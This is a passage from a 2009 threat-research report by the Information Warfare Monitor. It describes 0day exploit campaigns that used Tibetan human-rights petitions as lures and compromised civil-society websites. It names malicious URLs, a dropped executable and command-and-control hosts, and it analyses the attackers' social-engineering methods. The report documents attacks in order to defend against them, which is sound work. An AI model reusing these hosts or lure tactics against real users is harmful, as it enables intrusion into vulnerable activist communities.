    > Indians, westerners, and eight Australian parliamentarians. Wangchen&#8217;s wife,<br />
    > Lhamo Tso, who is a refugee in northern India, collected several thousand<br />
    > signatures with the help of the Tibet Post (www.thetibetpost.com).<br />
    ><br />
    > See Lhamo Tso&#8217;s campaign video:<br />
    > http://www.dailymotion.com/relevance/search/Dhondup+Wangchen/video/x9zgcf_petition-pour-la-liberation-de-dhon_news<br />
    ><br />
    > Li Dunyong, a Chinese lawyer hired by the family to defend Wangchen, is<br />
    > meanwhile being denied access to him. Li has allowed to see him only once<br />
    > since the start of the year in April. Like many human rights lawyers in<br />
    > China, he is being harassed by the government, which is threatening to<br />
    > rescind his licence if he does not drop the case.<br />
    > Vincent Brossel<br />
    > Asia-Pacific Desk<br />
    > Reporters Without Borders<br />
    > 33 1 44 83 84 70<br />
    > asia@rsf.org
</p></blockquote>
<p>The second link, hxxp://dump.vicp.cc/groups/articles.asp?n=3, is a malicious link that loads the petition but has another frame (hxxp://dump.vicp.cc/groups/ie.html) that loads a 0day exploit for Adobe Flash.<sup>24</sup></p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc5.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc5-300x66.png" alt="0day.doc5" title="0day.doc5" width="300" height="66" class="aligncenter size-medium wp-image-5283" /></a></p>
<p>This page loads &#8220;xp.swf&#8221; and drops &#8220;zjss.exe&#8221; onto the system which attempts to connect to pop.lovenickel.com (66.36.242.59) on port 8080 (there is not currently anything running on 8080). (This same domain was used in a 2006 0day for Japanese word processing software).<sup>25</sup></p>
<p>Also hosted in this sites is another page (hxxp://dump.vicp.cc/cach/news.asp?n=1) that uses http://www.leavingfearbehind.com as the bait. This is the website for the film &#8220;Leaving Fear Behind.&#8221; Dhondup Wangchen is director of the film.</p>
<p>In addition to loading the legitimate website, this link has another frame (hxxp://dump.vicp.cc/cach/error_01.htm) that loads the Microsoft Office Web Components 0day exploit.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc6.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc6-300x49.png" alt="0day.doc6" title="0day.doc6" width="300" height="49" class="aligncenter size-medium wp-image-5284" /></a></p>
<p>The IP address for dump.vicp.cc 210.56.60.132 which is assigned to:</p>
<blockquote><p>
netname: SUN-NETWORK<br />
descr: Sun Network (Hong Kong) Limited<br />
descr: Internet Service Provider in Hong Kong<br />
country: HK
</p></blockquote>
<p>Our investigation found that a malicious link also using www.leavingfearbehind.com as bait was posted in the comment section of BoingBoing on a post about the Uighur crisis. </p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc7.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc7-300x45.png" alt="0day.doc7" title="0day.doc7" width="300" height="45" class="aligncenter size-medium wp-image-5285" /></a></p>
<p>In addition to an email that was released by Reporters Without Borders (RSF) a web page was also setup on the RSF web site that highlighted the fact that more than 13,000 people signed a petition to release  Dhondup Wangchen. However, the page on the RSF web site contained the same link from the malicious email that included both the legitimate Facebook petition by Students for a Free Tibet as well as the malicious link to dump.vicp.cc.<sup>26</sup></p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc8.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2009/10/0day.doc8-300x94.png" alt="0day.doc8" title="0day.doc8" width="300" height="94" class="aligncenter size-medium wp-image-5286" /></a></p>
<p>RSF promptly removed the malicious link after being alerted.</p>
<p><strong>Conclusion</strong></p>
<p>Our findings indicate that civil society organizations are compromised and used as  vehicles to deliver 0day exploits to others (e.g. via malicious iframe inserted into a legitimate site). This means that (vulnerable) visitors to the site &#8211; many of whom may be staff and supporters of the specific organization &#8211; are likely to be compromised.</p>
<p>We have noticed that the attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available. While it remains unclear if the attackers were able to acquire these exploits before they became public, the fact that they are able to leverage 0day exploits quickly suggests that the attackers are closely monitoring their operations and have the capacity to adapt when necessary.</p>
<p>The attackers leverage human rights issues as the context for malware distribution in what are commonly called &#8220;social engineering&#8221; attacks. They will often send malicious emails to members, supporters and affiliates of civil society organizations. These emails are contextually relevant to the target organizations and contain a malicious attachment or link to a malicious site. The computer of the recipient will be compromised if he or she opens the attachment or visits the malicious website. </p>
<p>These attacks are effective. While it is difficult to determine the rate of successful exploitation, we often discover compromised computers at civil society organizations. Moreover, some of these social engineering attacks are so successful that civil society organizations continue to propagate malicious links within their communities without realizing it.</p>
<p>However, the murky questions of intent of the attackers as well responsibility for the attacks remain unclear. One could argue that the attacks are somewhat coincidental. The civil society organizations may just be running vulnerable software that was (automatically) exploited and used just like any other random target as a vehicle to propagate malware through the insertion of a malicious iframe. That is, there is no intent to target civil society specifically. Similarly, using a human rights themed email to in a social engineering attack might just be a convenient way to get peoples&#8217; attention; it is not about targeting civil society per se, just that human rights is an appealing topic and people might more easily enticed to click on such a link. </p>
<p>An alternative explanation is that attackers are intent on targeting civil society and are developing and/or have access to 0day exploits that they actively deploy. There have been consistent reports of attacks against civil society and we are noticing an increasing level of contextual relevance in these attacks.  Malicious emails appear to come from email accounts with legitimate names and contact information that are known to the targets. The text of the emails contain less spelling and grammatical errors and exploit legitimate email and petition campaigns. The level of specificity and intentionality exceeds the threshold for a group of attackers that simply wants to infect as many hosts as possible. On the contrary, these attacks actually may limit the total number of hosts but provide the attackers with politically sensitive hosts.</p>
<p>While we have no definitive answers concerning those behind these attacks, the result of using 0day exploits against civil society is that the exploitation rate is high. Moreover, the effect is that the community is being subjected to a form of intimidation and exploitation whether the attacks are intentional or not.</p>
<p><strong>About IWM</strong></p>
<p>The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in a Ottawa (Canada).</p>
<p><strong>About Malware Lab</strong></p>
<p>The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks. </p>
<p><strong>Notes</strong></p>
<p>1 To be clear, these attacks represent the use of malware by a wide variety of attackers and are not specifically linked to one another. They are included together as part of our analysis of the 0day threat that civil society organizations face.</p>
<p>2 http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf</p>
<p>3 http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf</p>
<p>4 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf</p>
<p>5 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf</p>
<p>6 http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network</p>
<p>7 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081210</p>
<p>8 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090219</p>
<p>9 http://isc.sans.org/diary.html?storyid=4177</p>
<p>10 http://www.malwaredomainlist.com/forums/index.php?topic=2564.0</p>
<p>11 http://isc.sans.org/diary.html?storyid=6739&#038;rss</p>
<p>12 http://www.nytimes.com/2008/07/11/world/asia/11china.html?th=&#038;emc=th&#038;pagewanted=all</p>
<p>13 http://www.hrichina.org/public/contents/press?revision_id=147917&#038;item_id=56408</p>
<p>14 http://www.amnesty.org/en/library/asset/ASA17/040/2009/en/9ede45c2-3943-4a5b-b75b-7ef68fb6d787/asa170402009en.html</p>
<p>15 http://www.ifex.org/china/2007/07/23/hackers_block_access_to_human_rights/</p>
<p>16 The FCCC&#8217;s WordPress installation was compromised and malicious iframes were inserted which loaded hxxp://www.nontopworld.com/homepage.htm and hxxp//http://www.nontopworld.com/mainpage.htm.</p>
<p>17 http://isc.sans.org/diary.html?storyid=6733</p>
<p>18 http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html</p>
<p>19 http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx</p>
<p>20 http://en.wikipedia.org/wiki/Phishing</p>
<p>21 http://wepawet.iseclab.org/view.php?hash=5f227eaf1e27d92a8c23e2daebbe4b2f&#038;type=swf</p>
<p>22 http://domain.oray.cn/#tab=free</p>
<p>23 http://www.tibetoffice.ch/news/circular_oot_geneva_280308.htm</p>
<p>24 http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html</p>
<p>25 http://www.symantec.com/connect/blogs/justsystems-ichitaro-zero-day-used-propogate-trojan-0</p>
<p>26 The same page in the Google cache from a day earlier did not contain the malicious link.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.infowar-monitor.net/2009/10/0day-civil-society-and-cyber-security/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

